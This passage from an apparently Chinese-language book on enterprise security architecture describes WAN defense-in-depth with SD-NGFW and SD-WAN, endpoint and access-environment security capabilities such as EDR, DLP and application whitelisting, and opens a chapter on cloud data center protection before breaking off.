在常规的分支机构及总部边界安全防护的基础上,建设广域网区域中心安全防护点,增加广域网防御纵深,形成“分支机构——区域中心——总部”的三层纵深防御架构,各层防护措施间协同联动,异构互补,可以全面收缩广域网攻击面,防范跨区域的网络攻击,限制网络威胁的影响范围,增强对总部及区域数据中心的安全防护。广域网纵深防御的整体架构如图6.8所示。 图6.8 广域网纵深防御的整体架构 ● 区域中心安全防护点 在区域中心安全防护点上部署防火墙、网络流量加解密、网络入侵防御、全流量威胁检测、文件沙箱、数据泄露检测等措施,对本区域中分支机构的广域网上行流量进行防护检测,并由企业总部统一进行管理维护,实现广域网汇聚层的全局流量控制,为安全态势感知提供广域网全局数据支撑。 ● 分支机构安全接入点 统一规划各分支机构安全接入点的安全能力要求,部署防火墙、网络入侵防御、全流量威胁检测、数据泄露检测、漏洞扫描等措施。保障分支机构安全接入企业广域网,减少网络威胁的引入。 6.3.5 安全措施部署 设计标准化、模块化的网络安全防护集群,提供流量清洗、网络访问控制、加解密、入侵防范、恶意代码防范、应用安全防护、安全代理、数据泄露检测、全流量检测、攻击诱捕等安全能力,通过NFV、SDN等技术实现安全能力服务化、弹性扩展和灵活调度编排,适配网络各边界节点的安全能力设计需求。 1.网络安全能力——安全措施的映射 网络纵深防御安全能力对应的安全措施如表6.2所示。 表6.2 网络安全能力-安全措施的映射 续表 2.基于SD-NGFW的网络安全防护集群 SD-NGFW(软件定义下一代防火墙)是在NGFW(下一代防火墙)的基础上,通过SDN技术提供灵活、高效的服务链编排能力,并以NFV方式扩展多种网络安全组件,从而面向企业网络提供集成化的高性能安全网关解决方案。 基于SD-NGFW构建网络安全防护集群,能够高度集成安全功能、弹性扩展处理能力,能适应复杂网络的组网环境,可以满足多种场景的网络安全防护需求。 ● SD-NGFW和安全硬件集群 在实现NGFW功能的基础上,通过其服务链编排能力,将流量调度至外部的其他安全组件进行检测,并完成转发。可以充分利用现有的网络边界安全防护设备;适用于已有建设基础的企业由传统架构向安全硬件集群的平滑过渡。 ● 独立的盒式SD-NGFW SD-NGFW基于NFV扩展多种安全组件,并基于自身的服务链编排能力将流量调度至内置的多类安全组件以完成检测及转发;适用于性能需求较低的中小企业用户。 ● 分布式SD-NGFW机框 基于分布式机框架构,提供具备独立运算资源的安全组件,大幅提升性能及安全功能扩展能力;适用于大型企业、园区网用户。 基于SD-NGFW的网络安全防护集群逻辑如图6.9所示。 图6.9 基于SD-NGFW的网络安全防护集群 3.基于SD-WAN的分支机构接入 安全SD-WAN(软件定义广域网)为多分支机构、数据中心互联、混合云等场景的用户提供广域安全组网方案,可以解决网络运维成本高、广域组网复杂等问题,实现灵活便捷、按需定制的网络连接,提供弹性扩展的安全防护能力,提升业务体验,保障业务安全,降低TCO(总体拥有成本)。 ● 安全组网:采用增强的隔离技术,在企业总部和分支机构之间建立业务隔离的安全加密连接,保证企业业务数据传送的安全性及私密性。 ● 快速部署:自动获取初始化网络配置和安全策略配置,实现快速上线,降低了分支机构开通业务的复杂度。 ● 链路整合:支持Internet、4G、MPLS等多种广域出口的统一整合,支持故障自动切换,保证业务持续服务不受影响。 ● 智能选路:自动监测广域网的端到端服务质量,实现基于应用的路径优选和质量保证。 ● 全面防护:实现漏洞防护、病毒防护、数据加密传输、上网URL过滤、身份认证、权限管控、威胁识别等能力。 ● 集中管控:提供可视化的集中管控能力,实现自动化运维、网络编排、安全编排、业务管理。 安全SD-WAN的部署示意如图6.10所示。 4.网络流量分析 全面捕获网络流量,按需开展资产发现、网络威胁检测、数据泄露检测和网络行为审计等工作,增加网络流量的可见性,为态势感知提供全局网络流量数据,支撑网络纵深防御体系的持续优化。 ● 流量捕获 在基于SD-NGFW的网络安全防护集群中,通过流量编排,将流量复制给网络流量分析设备;在传统环境下,通过流量镜像、链路分光等方式,捕获网络流量,经过分路器聚合处理后,按需分发至各类网络流量分析设备。 ● 网络流量加解密 通过SD-NGFW、LB、专用加解密设备,对网络加密流量进行解密还原和加密回注,为网络流量分析设备提供明文流量数据。 图6.10 SD-WAN的部署示意图 ● 资产发现 通过专用硬件、NFV方式部署资产发现设备,基于网络流量被动探查资产的新增、异常情况。同时统计资产的访问关系,用于支撑本节点网络访问控制策略的设计及有效性分析。 ● 网络威胁检测 通过专用硬件、NFV方式部署全流量威胁检测设备,检测和发现已知的高级网络攻击和未知的新型网络攻击。 ● 数据泄露检测 通过专用硬件、NFV方式部署数据泄露防护设备,监测敏感数据的流转情况,对违规传输敏感数据的行为进行告警。 ● 网络行为审计 通过专用硬件、NFV方式部署网络行为审计设备,通过协议还原,监测记录应用访问、数据库访问、互联网访问等行为。 5.威胁情报应用 通过威胁情报的应用,可以全面提升网络威胁检测识别的效率,增强网络纵深防御成效。 ● 事前 大幅提升预防效果。基于精准、热度的威胁情报信息,在网络安全设备上配置黑名单、热补丁等措施,对目前的流行、突发事件进行精准预防,减少安全事件发生的可能性。 ● 事中 实时阻断恶意行为。在网络安全防护设备上内置威胁情报信息,实时匹配恶意网站、非法IP名单等访问连接情况,阻断恶意访问行为,减少安全事件危害。 ● 事后 快速定位失陷主机。全面监测网络流量,获取出站连接的域名或IP,与威胁情报的C&C域名和IP进行关联比对,及时发现失陷主机,经过人工审核后,调整防火墙策略,阻断失陷主机与外部控制端的通信。 6.3.6 运行管理 针对各节点的网络安全防护集群,建设统一的运行管理平台,实现安全策略全生命周期的自动化管理,支撑态势感知平台安全事件的响应处置。 1.安全策略管理 实现网络安全防护设备的集中策略管理,包括安全策略的采集、解析、可视化展现、装配、审核、下发执行和备份等。同时结合网络流量分析,统计网络各边界的访问关系情况,自动与现有的策略配置进行对比,梳理安全策略有效性问题,支撑策略优化工作。 2.运行状态监控 实现网络安全防护设备运行状态的集中监控管理。监控内容包括CPU使用率、内存使用率、CPU温度、系统盘使用率、当前是否在线等。通过监控自动发现设备运行状态告警、异常情况,及时进行排查修复,保障安全设备的可靠运行。 3.安全数据采集 将各安全防护集群的安全数据接入态势感知平台和内部威胁感知平台,为安全分析提供全局网络安全数据支撑。 4.运维安全管控 通过管理网络,对网络中的安全设备进行运维管理。基于零信任架构和ABAC模型,与身份管理及访问控制平台对接,实现运维管理人员的统一身份认证、授权和操作行为审计,实现特权账号的全生命周期管理、密码托管和使用申请审批。对运维管理操作实施动态细粒度的访问控制,将资源的访问权限最小化。 第7章 数字化终端及接入环境安全 7.1 数字化转型与业务发展的新要求 7.1.1 新技术新业务发展挑战 在组织进行数据化转型的过程中,大量新型数字化基础设施的建立,将会逐渐改变IT设备之间、员工与IT设备之间的交互方式,这些数字化转型的背后需要具有良好体验的个人工作空间作为支撑。工作空间的用户体验看似不重要,但却对数字化转型产生极大影响的挑战,而终端则是个人工作空间的重要载体,也在很大程度上决定了实际的体验效果。所以把终端重新定义为数字化终端,目的是为了突出终端数字化转型工作目标上的差异。 1.数字化发展将形成不同形态的数字化终端 过去一直有一种观点,即大量计算工作的需求未来将越来越多地转移到数据中心,对本地终端的性能和配置的要求会逐渐降低。云桌面正是这一观点的主要实践。本地的瘦客户端并不需要大量的计算性能,实际的计算和存储都通过网络发生在远程的数据中心虚拟桌面上,特别在网络吞吐不断增加和延时不断降低的情况下。但本书的观点是,这并不是所有终端的未来场景,数字化不断变革对本地计算、边缘计算提出了更高的要求,一方面计算能力的前置能解决体验问题,大量应用程序需要在本地完成计算工作,以便提供效率更高的交互式响应;另一方面在终端和终端之间交互的场景,也需要大量计算能力的支撑。因此为满足不同场景的需要,终端将发展成为不同形态的数字化终端。 2.数字化终端的范围边界被重新定义 我们将数字化终端的范围进行重新定义,包括PC、云桌面、专用终端、移动终端、国产化终端等。PC包含Desktop(桌面型)和Laptop(膝上型);云桌面涉及VDI(虚拟桌面架构)、VOI(虚拟系统架构)、终端应用虚拟化等;专用终端包含各类场景下的自助服务终端和特殊用途终端,如ATM、VTM等;移动终端包含苹果iOS和大量碎片化的Android系统手机、平板等;国产化终端主要指使用国内自主芯片和OS的终端,如使用飞腾处理器和麒麟操作系统的终端。这些终端的共同属性就是为用户提供个人工作空间。我们并没有把数据中心计算终端或者物联网终端纳入其中,主要原因是它们提供的是工作负载与生产力,而不属于个人工作空间范畴。 3.单个用户多终端场景和终端归属的逐渐复杂化 在组织数字化转型的过程中,除终端类型不断增加外,还有几个特点。一是用户可能存在多个终端的问题。早些年,本地计算资源相对匮乏,甚至存在多个人使用一个终端的情况,而今天大多数员工都拥有多台终端,比如办公室固定终端、移动PC终端、手机终端、平板终端、虚拟化终端等。员工在使用多个终端时会面临管理一致性、多个工作空间互联互通的问题。当用户需要在多个相互独立的工作空间上工作时,会极大地降低数字化转型下的工作效率。二是终端归属逐渐复杂化。过去在一个严格管理的组织内,工作必须由组织提供的终端资产完成,个人终端资产不能参与到工作中,企业终端资产不能用于个人用途。但如今组织内可能会存在企业终端用于个人目的(常见于办公网移动PC终端),或者个人终端用于企业目的(常见于个人移动手机终端)的情况,还有部分第三方不可管理终端。这些都极大地增加了数字化终端纳管和安全管控的复杂性,也是组织在数字化转型过程中需要面临的重要挑战。 7.1.2 企业终端攻防形势与传统安全措施的局限 终端安全是企业安全能力的一道重要屏障,原因是终端常常被攻击者作为入侵企业数据中心的跳板。一般情况下,组织对数据中心外部的安全相对更加重视,会增加数据中心被入侵的难度,甚至部分企业的数据中心只服务于内部组织,攻击者无法直接访问。但是终端却为攻击者提供了桥梁,所以说终端安全很多时候是企业安全能力的一道屏障。在数字化转型过程中,丰富的终端类型、复杂的终端所有方、用户普遍使用多终端,导致的结果是终端安全保障需求越来越难以应对。 从攻击者视角来看,针对终端的网络攻击通常是变现最快的一种手段。一方面,近年来由于数字货币、匿名支付的发展,大量的勒索病毒攻击频发,这些攻击不一定需要非常清晰的目标,直接通过无差别攻击会产生更大的收益。这些新形势下的安全威胁在更大程度上威胁到终端的安全。即使在终端自身安全性没有问题的情况下,勒索软件只需要针对终端数据进行加密就能达到目的。另一方面,在数字化背景下大量终端需要接入企业资源,如何确保接入设备不被攻击者仿冒,以及设备所关联的用户不被仿冒,这是终端除自身安全外需要重点考虑的问题,也是大量移动终端面对的安全挑战。这些问题也在提醒我们,终端安全不只是终端自身问题,需要关联其他对象综合考虑。 过去常见的终端安全解决方案都是相互孤立的,缺乏真正意义上整体思考终端安全的需求、终端所需的完整的安全能力、统一的跨平台管控手段、一致的安全管控策略、有效适应终端资产所属场景的管理模式,更没有形成可以灵活编排的终端安全策略机制,也未考虑个人工作空间的安全互联问题,这些都在极大程度上制约了组织在数字化转型上的用户体验,数据中心的大量资源投入可能最终并未使终端用户感受到直观的变化。甚至由于个人工作空间的体验问题,数字化转型的阻力由此增加。而这些焦点都集中在了数字化终端安全的相关问题上。 7.2 什么是数字化终端及接入环境安全 7.2.1 基本概念 数字化终端及接入环境安全是对各类企业接入终端安全纳管、终端自身安全、终端协同安全、终端安全运行支撑以及接入环境安全的综合定义。其中终端不以企业资产为边界,而是涉及企业接入的所有非IoT终端范围。数字化终端及接入环境安全是组织在信息化基础设施及网络末梢安全建设中的重点工作。 理解数字化终端及接入环境安全概念的前提是理解其安全需求,首先,是终端的安全需求,终端本质上是一个面向最终用户计算、存储和网络接入能力的集合。所有与计算、存储、网络接入相关的安全能力都需要在这个载体中得以体现,如恶意代码查杀、入侵防护、访问控制、行为审计、数据安全等。可以说终端对安全能力的要求是一个体系化的集合,而不只是一两个控制点。其次,终端也是数据中心计算、存储和网络服务的延伸,组织只将安全资源投入到数据中心是远远不够的,被保护数据从数据中心到终端的延伸,一定会导致安全问题的延伸,所以终端安全不仅需要考虑自身的安全问题,还需要考虑与组织整个安全体系的融合,而不是将终端安全做为孤立的一部分。最后,终端所处的使用环境在一定程度上决定了终端自身的安全性,而这些环境的安全管理通常与终端的安全管理部署在同一位置,因此数字化终端的安全设计不能脱离接入环境,接入环境安全或者末梢网络安全也需要纳入整个终端安全概念体系。 7.2.2 设计思想 数字化终端及接入环境安全的设计是一个复杂的话题,在不同的场景、终端类型、资产所属下,管理方法和安全目标的定义都可能存在一些差异性。但是在数字化转型过程中,组织的管理和安全保障的体系框架是相似的,所以分别从数字化终端纳管、数字化终端安全防护、网络接入环境安全和统一安全运行支撑4个维度进行设计。 1.数字化终端纳管设计 终端纳管能力的设计又可以从以下4个方面进行考虑。 首先,是终端在组织内的注册,包括与关联使用者的绑定、部门所属等。注册的目标在于建立组织、人与终端资产的关系,为后续终端的集中管理提供信息支撑。即使针对BYOD(Bring Your Own Device,自带设备)的终端资产也存在注册需求。组织内部可借此对所有涉及业务访问的资产实现全面可视化。 其次,由于终端资产存在大量变更需求,且需要纳入CMDB(Configuration Management Database,配置管理数据库)集中管理,因此对组织所拥有的资产进行持续性跟踪就显得尤为重要。针对终端资产的管理是IT服务管理的一部分,同时也是终端安全管理的重要基石。 再次,是使终端具备能够在组织内快速接入资源的能力,通常也称为使能(Enable),旨在为终端工作空间提供各类办公工具和访问入口,为不同人员访问相关业务配备一切所需的资源,包括对浏览器的配置、常用应用的访问链接、应用软件的本地部署、企业应用市场甚至是软件授权管控等。这些工作无法全部在终端操作系统的构建阶段完成,因为工作空间的资源通常是动态变化的,静态的操作系统模板会降低资源配置管理的灵活性。终端的使能也是终端主动进行注册的动力之一。 最后,是针对终端外设的管理。移动外设通常作为组织数据摆渡的重要桥梁,也需要纳入企业资产管理,但外设的特点在于通过终端间接被管理,实际对外设产生管理行为的是终端自身,所以也归为终端纳管的一部分。整个终端纳管的设计目标是建立组织对终端设备及资产的可视化管控、所需资源的快速部署,同时也是终端安全能力得以实现的重要基础。 2.数字化终端安全防护设计 终端安全技术防护设计需要考虑四大关键领域,分别是终端自身安全能力、终端协同安全能力、终端安全数据支撑能力和终端策略编排能力。 终端自身安全是为了保障终端从硬件到系统乃至应用安全的基础措施,需要从架构安全、被动安全、积极防御3个阶段考虑安全能力的设计。 终端协同安全能力则是终端安全延伸所带来的挑战,从身份识别到可信接入、从可信接入到安全隔离、从安全隔离到行为审计、从行为审计到数据监控。所有这些协同安全的目标都是为了解决数据在终端上延伸导致的安全问题。 终端安全数据支撑能力则是自身安全状态与所处环境的全景描述,而终端策略编排能力则是终端能力协同的关键,例如在发现终端安全状态或环境发生改变时自动使用动态响应策略完成主动防护的动作。终端策略编排能力是自动化安全响应的基础。在此基础上,终端安全还需要考虑将一部分安全所需的计算能力外延至终端外部,原因是确保安全能力的承载不会大量占用终端自身资源从而降低用户体验,而用户体验是一切安全能力落地的前提。例如,可将样本的深入分析能力迁移至终端外部,借此平衡性能,而且不会损失安全效果。 3.网络接入环境安全设计 在末梢网络接入环境中,由于组织的特点将导致其与其他网络的管理相独立。当组织存在大量小型分支机构时,接入网络和终端很有可能是合并管理的,由不同的分支机构完成所属环境的分布式管理,完全集中的安全设计反而会带来复杂性。例如在一个存在大量门店的企业,或者存在大量二级单位的组织中,虽然末梢网络规模不大,但数据较多,安全问题不容忽视。安全设计既需要考虑内部接入可信问题,也需要考虑外部接入风险。同时由于本地技术管控能力较弱,安全设计需重点考虑两个关键问题:接入环境下的纵深网络防御以及网络接入环境的出入控制。在解决这两个问题时还同时需要满足简易部署和简易运维的需求。 4.统一安全运行支撑设计 统一安全运行支撑设计是为了有效支撑运营工作,从安全设计的角度需要分别考虑运维管理的分布需求、事件调查的流程需求、威胁鉴定的工具需求、处理过程的自动化需求。只有综合以上运行管理支撑的诉求,终端的统一安全运行工作才能在有效的资源环境下得以实现。组织执行终端安全运行管理时,需要从标准纳管、分权操作、分级管控、集中分析、全局可视几个维度出发,充分利用终端的安全能力和数据资源,在构建统一的安全运行管理支撑能力的基础上,一方面完成终端场景的安全保障需求,另一方面实现与企业数据安全、系统安全、身份安全、行为安全等其他安全运营目标的有效衔接,进而从容应对组织数字化转型过程中不断变化的边缘侧网络安全风险。 7.2.3 总体架构 综合上述设计思想,要实现数字化终端及接入环境安全建设,提升企业网络终端整体安全能力水平,需要建设终端系统安全栈、末梢网络安全栈和终端统一安全运行支撑等三大体系,并且建立与外部系统的有效协同关系,形成安全共同体,如图7.1所示。 图7.1 数字化终端及接入环境安全总体图 建设终端系统安全栈,实现终端上各种安全保障及服务能力,一方面是通过网络互联平面与末梢网络安全栈形成边缘侧的安全防御整体,另一方面是通过管理控制平面与终端统一安全运行支撑,终端提供具体的执行能力。终端系统安全栈的建设能力是企业终端安全的核心建设任务。 建设末梢网络安全栈,能够实现以安全策略强制执行为目标的终端安全接入控制能力和末梢网络外发流量及内容的控制能力,实现终端所在的末梢网络环境的安全。 建设终端统一安全运行支撑能力,是要建设以用户为对象的终端分级管理控制平台,通过联通PC终端、移动终端、云桌面、专用终端的控制平面,实现终端管理过程中服务能力、终端覆盖、数据信息三方面的统一。 建设与外部安全系统的有效协同关系,与身份管理与访问平台、安全态势感知平台、内部威胁感知平台、系统安全平台、数据安全管理与风险分析平台等五大平台的联通,形成安全能力体系化聚合,实现终端安全管理与整个安全体系的关联,形成安全统一架构。 7.2.4 关键技术 1.终端安全策略编排 策略编排是自动化响应的关键手段,是降低安全运行维护成本、提高安全运行效率的主要方法。终端安全策略编排,是协同终端各类安全能力的核心,也是SOAR(Security Orchestration,Automation and Response,安全编排、自动化和响应)技术在终端安全场景下的落地,可使终端安全策略的执行根据终端环境与状态的变化进行自适应。 2.AI引擎 引擎是终端安全领域的核心技术,是判定一个文件是否为病毒的一套程序机制。AI(Artificial Intelligence,人工智能)引擎是利用机器学习等AI技术,对海量样本进行自学习后,引擎自动总结出的病毒文件识别能力,以便在未捕获样本的前提下有效识别未知病毒。 3.云查引擎&沙箱 云查引擎是指将病毒样本分析过程和病毒哈希特征库都置于云端,本地只保留一个非常小的本地特征库,当发现一个新文件时,直接通过哈希特征库的云端查询就能快速识别文件是否为病毒,从而降低终端本地的系统资源占用。沙箱是一种文件动态行为识别技术,云沙箱是将样本文件直接放入云端虚拟化环境中运行,通过监控运行过程从而跟踪文件的行为,并根据文件行为判断是否为恶意程序。 4.应用程序控制 应用程序控制颠覆了传统反病毒软件的黑名单机制,而是采用白名单方式来保障系统的安全。只有管理员明确后的进程才可以运行,只有管理员配置的特定进程才能访问敏感文件和注册表。应用程序控制,一方面可以大幅降低由于应用缺陷导致其自身权限被恶意滥用的可能,另一方面可以用于解决对终端数字资源保护的需求,屏蔽关键数据的获取。 5.补丁部署自动化编排 当终端数量达到一定规模时,自动打补丁机制有可能会带来许多负面问题,因此自动从云端更新补丁库后,预先设置好灰度发布批次和漏洞修复策略(分时间段、按级别、排除有兼容性问题的补丁等),控制中心可定时自动更新补丁库,自动化编排,完成漏洞的修复。 自动化编排,即将全网终端划分为由小到大的多个批次,先自动推送给第一个小批次分组,如无问题自动推送给下一个批次,直到推送给全网。如有问题,只需将有问题的补丁添加到排除列表并卸载已安装的终端即可。整个推送安装过程实现自动化编排后,管理员无须过多参与即可完成安装。 6.工作区隔离 一个终端使用技术手段同时开辟两个相对独立的工作区域,每个工作区域有不同的桌面配置、文件存储与安全机制,该工作区内的所有数据无法转移至另外一个工作区内,从而实现一台终端可以安全访问两个完全独立的网络,并且保证每个网络的数据安全。 7.环境感知 用来对终端环境进行安全环境感知和安全状态识别,并将感知状态传递给其他安全策略组件,如访问控制中心,为业务访问提供终端的安全度量和安全评价等信息,实现主体安全状态动态的业务访问控制。也可以基于环境策略触发终端安全策略更新。 8.终端DLP 终端DLP(Data Leakage Prevention,数据防泄露)是通过内容识别技术防止企业敏感文件通过终端泄露的一种数据安全技术,能够实现对终端存储数据、终端使用数据、终端外发数据的保护,同时可以结合数据标记、数据加密、数据权限管理等技术实现数据安全。 9.终端EDR 终端EDR(Endpoint Detection & Response,终端检测与响应)是通过终端上的“探针程序”(Agent)采集终端各个维度的数据,包括静态以及内存中运行态的数据,上报到后端的管理分析平台。该管理分析平台通过一定的分析模型和外部威胁情报,能够及时和快速发现可能出现的高级威胁。 10.移动安全容器 基于Android Intent隔离技术以及对系统的Hook能力,将Android系统分割成普通的运行环境和特有的安全虚拟运行环境(简称为安全容器,也称为应用沙箱)。安全容器与外部是完全隔离的,安全容器内的应用可相互通信,交换数据,所有数据均是高强度加密的(默认是AES,也支持国密算法SM4)。安全容器内部实现了运行态的访问控制功能,外部应用无法访问容器内的应用,所有的网络访问、数据交换等均受到安全容器的访问控制。默认情况下,外部应用无法访问到内部应用以及任何数据。 11.移动应用封装 传统的应用封装技术是基于拆包技术实现的,通常是将App解开后,将需要封装的代码插入相应位置。这种技术不仅破坏了应用的完整性,而且对应用的兼容性也产生了很大的影响。新一代的应用封装技术不需要拆包进行应用封装,可以将安全组件(如杀毒应用、环境感知应用等)融入到业务应用App,与业务应用集成为一个App,且拥有相同的生命周期。这既保障了应用的安全,又不会改变业务应用的体验和兼容性等。 12.接入层NDR 接入层NDR(Network Detection & Response,网络检测与响应)是通过采集接入层网络流量中更多维度的数据,从而对网络攻击行为进行更细粒度的判断的一种技术。 7.2.5 预期成效 1.终端安全管理一体化 作为一个在数字化时代能够保障业务安全有序运转的机构,应充分考虑组织的管理模式和文化,在确保为终端用户提供良好用户体验的基础上,建设跨数字化终端类别的统一安全管理体系。 终端安全管理一体化能够充分考虑到办公终端的多样性,可以拟合PC终端、哑终端[1]、服务器终端、移动终端,针对异构外设提供统一的安全管理能力;能够在终端和接入环境上构建面向终端硬件、操作系统、应用软件、数据资源、用户身份、操作行为和末梢网络的一体化安全技术栈;能够充分考虑到终端管理的复杂性与完备性,提供杀毒、加固、管控、运维、准入、外设管理等多种管理能力,形成完备的终端管理一体化,充分支持企业安全治理工作。 2.终端威胁防御立体化 终端是安全的最后防线,所有威胁都会通过网络空间的连接直接与终端发生关系。终端威胁防御立体化能够在终端上提供架构安全防护、数据安全防护、被动防御、主动防御、行为管控、操作隔离等威胁立体化防御能力;能够基于威胁维度、设备维度、数据维度、身份维度、大数据分析维度,充分解决已知、未知和APT(Advanced Persistent Threat,高级持续性威胁)攻击等威胁。 3.终端安全运营数字化 基于数字化管理思想和指标化度量思想,制定和落实标准纳管、分权操作、分级管控、集中分析、全局可视的安全运营目标,通过指标化运营提高整个终端安全建设的有效性。 4.终端安全建设协同化 充分利用终端的安全能力和数据资源,实现与企业数据安全、系统安全、身份安全、行为安全等其他安全运营目标的有效衔接和深度聚合,进而从容应对组织数字化转型过程中不断变化的边缘侧网络安全风险。 7.3 数字化终端及接入环境安全建设要点 7.3.1 总体流程 首先,要建设统一的终端安全管理客户端系统和终端系统安全栈,一方面用于承载终端中的各种安全服务与控制能力,另一方面统一提供面向用户和控制平面的接口,使各类安全能力都基于统一的用户界面、统一的策略管理和统一的日志管理在终端侧进行部署。 其次,要建设终端侧末梢网络安全管理系统和终端末梢网络安全栈,在满足网络接入层纵深防御的基础上,实现以“终端入网必合规、合规再入网”为目标的动态控制能力。 再次,要建设以终端用户为中心的策略控制运行管理平台和统一安全运行支撑能力,打通PC终端、移动终端、云桌面、专用终端的控制平面,实现终端管理过程中服务能力、终端类别、数据资源三方面的统一。 最后,要建设外部系统协同能力,通过与身份管理与访问控制平台、安全态势感知平台、内部威胁感知平台、系统安全平台、数据安全管理与风险分析平台进行协同,能够将现有自闭环系统组成更庞大的生态系统,更好地解决未来更加复杂的安全问题。 7.3.2 终端系统安全栈建设 建设终端系统安全栈,是指建立企业终端十大安全能力,如图7.2所示。全方位解决终端威胁并提供面向未来的终端能力建设,其中包括底层的终端纳管能力、数据支撑能力,支撑终端自身安全能力演进的架构安全能力、被动防御能力、积极防御能力,以及支撑终端协同安全能力演进的身份安全能力、接入管控能力、隔离设施能力、行为管控能力、数据安全能力等。 ● 终端纳管能力 通过终端纳管能力的实施,实现包括用户注册与服务管理、终端资产发现与管理、应用软件及授权管理、终端外设与移动介质管理在内的终端全生命周期管理工作,降低终端运维服务成本。 图7.2 终端系统安全栈 ● 数据支撑能力 通过终端数据支撑能力的实施,实现包括终端环境感知、终端安全状态评估、终端日志采集等工作,提高终端数据利用能力。通过部署终端日志、安全状态及环境信息的感知、采集和共享措施,使终端安全数据共享至网络安全、云安全、身份与访问控制等多个安全领域,并最终实现体系之间的安全能力协同。 ● 架构安全能力 通过架构安全能力的实施,实现终端固件扫描及管理、终端应用程序控制、配置/漏洞修复与补丁管理、安全配置/漏洞/补丁发现等工作。对终端的重要应用构建应用程序控制手段,通过白名单控制进程的启动、跨越进程的调用和应用数据的访问,实现提升终端自身强壮性和未知攻击抵御的能力。 ● 被动防御能力 通过被动防御安全能力的实施,实现终端防火墙与入侵防护、终端恶意代码防护等工作,提高终端威胁对抗能力,解决终端的基础威胁问题。 ● 积极防御能力 通过积极防御安全能力的实施,实现终端检测与响应(EDR)等工作,提高终端自身对未知威胁的深度分析能力。通过对终端本地进程活动、文件信息、资源调用行为的收集,实现对高级威胁的有效研判分析与追踪溯源。 ● 身份安全能力 通过身份安全能力的实施,实现终端用户强认证工作,使终端身份具有高可靠性、不可篡改性。 ● 接入管控能力 通过接入管控能力的实施,实现终端合规接入管理,与网络接入管理设备进行协同,使非合规终端无法接入网络。 ● 隔离设施能力 通过隔离设施能力的实施,实现终端工作区隔离,在PC终端构建出独立的安全隔离工作区,用于专网互联,实现工作区内应用程序、数据存储、网络通信与承载系统的相互隔离。 ● 行为管控能力 通过行为管控能力的实施,实现终端行为审计与控制,做到终端可管、可控。其中包含违规操作发现、异常行为控制等措施,并在打通内部威胁防控平台的基础上扩展用户行为分析的广度和深度。 ● 数据安全能力 通过数据安全能力的实施,实现敏感数据发现与泄露控制、文档加密与屏幕水印等工作,实现终端侧数据泄露防护(DLP),并在打通数据安全管控平台后实现数据安全治理与保护策略的统一。 7.3.3 末梢网络安全栈建设 建设终端侧末梢网络安全栈,实现以强制执行安全策略为目标的终端安全接入控制能力和末梢网络外发流量及内容的控制能力,实现终端动态接入控制及末梢网络内互访的检测和控制能力。其中包括纵深防御、接入管控、准出管控等三大核心能力。 ● 纵深防御能力 建设纵深防御能力,是指执行终端网络外发内容审计与控制、终端网络访问行为审计与控制、网络威胁防护、网络威胁检测与响应(NDR)等工作,实现对末梢网络到互联网或业务专网的资源访问、数据外发的行为检测,发现与控制可疑安全事件,并与终端数据一起关联至内部威胁防控平台、数据安全管控平台来扩大安全协同范围。通过纵深防御能够实现网络威胁检测与响应(NDR),对末梢网络内部之间存在的网络攻击进行持续监测、分析与响应,及时发现内部攻击事件。 ● 接入管控能力 建设接入管控能力,是指执行网络接入管理工作,可以根据终端设备合规程度、安全状态、环境情况实现终端入网规则的动态访问控制,实现终端入网必合规、先合规再入网的控制能力。 ● 准出管控能力 建设准出管控能力,是指执行互联网访问管理工作,针对采用分布式远程接入的小微型分支机构,需要提供通过专线或互联网VPN上联至机构广域网的一体化接入系统,同时使用软件定义方式为末梢网络提供网络安全防护措施,并为有需要的分支机构提供安全受控的互联网访问能力。 7.3.4 终端统一安全运行支撑能力建设 建设终端统一安全运行支撑能力,是指建设以用户为对象的终端分级管理控制平台,通过联通PC终端、移动终端、云桌面、专用终端的控制平面,实现终端管理过程中服务能力、终端类别、数据资源三方面的统一。其中包括分级策略管理、威胁鉴定、事件调查分析、流程化运营操作等四大运行支撑能力平台。 ● 分级策略管理平台 建设分级策略管理平台,将信息世界的企业数字化终端与物理世界的企业员工进行一一对应,并通过物理世界的组织属性来实现信息世界中数字化终端的有组织管理,从而实现物理世界与信息世界的员工同构管理。 ● 威胁鉴定平台 建设本地威胁鉴定平台,将终端威胁情报引入内部网络,使得企业终端既使无法连通互联网,也可以相互之间共享威胁情报。 ● 事件调查分析平台 建设事件调查分析平台,在不增加终端计算能力,不影响用户体验的前提下,实现对可疑样本的深入分析和安全事件的追踪调查。 ● 流程化运营操作平台 建设流程化运营操作平台,结合规范化的标准操作流程(SOP),实现对当前终端安全整体状态的准确洞察以及运营工作的高效支撑,并辅助管理者的指挥与决策。 7.3.5 外部系统协同能力建设 随着IT建设复杂化的发展趋势,与IT配套建设的安全建设也必将向复杂化趋势发展。在各个安全产品之间、安全系统之间,会通过协同的方式建立一个更大的系统,形成更加有效的安全共同体。其中包括与身份管理与访问平台、安全态势感知平台、内部威胁感知平台、系统安全平台、数据安全管理与风险分析平台等五大平台的联通。 ● 与身份管理与访问平台联通 将终端与身份管理与访问平台联通,利用终端将物理身份与数字身份进行一一绑定,从而能够构建一个动态的身份与访问管理体系,能够在未来通过零信任架构有效提升企业的业务访问的安全性。 ● 与安全态势感知平台联通 将终端与安全态势感知平台联通,能够将终端的位置信息和威胁信息作为本地威胁情报的一部分,为安全态势感知平台提供更精确的威胁定位和态势分析。 ● 与内部威胁感知平台联通 将终端与内部威胁感知平台联通,能够基于终端的日志数据和UEBA技术进行异常分析,有效应对内部欺诈、权限滥用、数据窃取、意外泄露、系统破坏等多种内部威胁类型。 ● 与系统安全平台联通 将终端与系统安全平台联通,能够通过保障终端资产、漏洞、配置、补丁的有效运行,进而保证整个系统安全建设的安全有效。 ● 与数据安全管理与风险分析平台联通 将终端与数据安全管理与风险分析平台联通,能够有效实现终端侧的数据采集、数据传输、数据存储、数据运维、数据使用与数据销毁的全生命周期管理,从而实现终端侧的数据安全能力建设。 联通身份管理与访问、安全态势感知、内部威胁感知、系统安全、数据安全管理与风险分析等平台,可实现安全能力的体系化聚合,将终端安全管理与整个安全体系进行关联,形成更加有效的大安全系统。 第8章 面向云的数据中心安全防护 8.1 数字化转型与业务发展的新要求 8.1.1 数字化转型促进数据中心向云化发展 当前,大数据、人工智能、物联网等新兴技术正在持续助推社会、企业的数字化转型。数据中心作为信息技术的重要载体,随着云计算的全面深入应用,也将从传统物理结构向全面云化发展演变。由于传统数据中心与云数据中心在技术采用、建设理念、管理方式方面存在较大差异,相应地,面向数据中心的安全也需要进行转变。基于传统数据中心的安全防护体系已经不再适用于如今数据中心云化进程中的安全防护任务。 8.1.2 云化数据中心面临的安全挑战 ● 